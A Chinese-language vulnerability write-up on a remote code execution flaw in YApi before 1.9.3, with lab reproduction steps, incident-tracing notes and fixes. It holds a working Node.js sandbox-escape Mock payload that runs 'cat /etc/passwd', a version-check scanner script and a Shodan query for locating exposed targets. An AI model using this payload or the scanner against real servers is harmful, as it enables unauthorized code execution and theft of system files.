文章目录
漏洞简述
漏洞影响版本
如何判断YApi当前版本?
Shodan 搜索语法
漏洞exp
漏洞环境搭建
漏洞复现
入侵溯源
修复方式
YApi 是一个可本地部署的、打通前后端及QA的、可视化的接口管理平台。若Yapi对外开放注册功能,攻击者可在注册并登录后,通过Mock构造特殊的请求执行任意代码,获取服务器权限。
YApi < 1.9.3
YApi网站底部显示了当前版本号,不过该version是通过js渲染生成的,直接请求首页无法拿到版本号。我简单写的一个脚本判断yapi版本号。
import requests
import sys
import re
ip = sys.argv\[1\]
baseurl = "http://" + ip + ":3000/prd/"
aseet\_js = "assets.js"
r = requests.get(baseurl+aseet\_js)
regex = r"[email protected]\[\\w\]+?.js"
index\_js\_name = re.search(regex,r.text).group()
index\_js\_url = baseurl +index\_js\_name
regex = r'newVersion:"(\[\\d.\]+)"'
r = requests.get(index\_js\_url)
version = re.search(regex,r.text).group(1)
print(ip,version)
\# 判断当前版本是否小于1.9.3
\_,v,sub\_v = version.split('.')
if int(v) < 9 or int(v) == 9 and int(sub\_v) <3:
print(version," http://" + ip + ":3000")
http.favicon.hash:-715193973
https://github.com/j2ekim/YApi_exp
cd vulhub/yapi/unacc
docker-compose up -d
访问 http://IP:3000 首页点击注册。
添加项目。
设置Mock后保存。
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child\_process").execSync("cat /etc/passwd").toString()
访问Mock地址。
复现成功。
yapi本身没有日志,所有信息记录在数据库中。这里我用docker搭建的漏洞环境,使用的mongdb。由于该漏洞需要注册才能利用,可通过数据库查询攻击ip。
升级至1.9.3以上版本。
编辑Yapi目录下的 config.json 文件,设置 closeRegister 为 true,关闭Yapi的前台注册功能。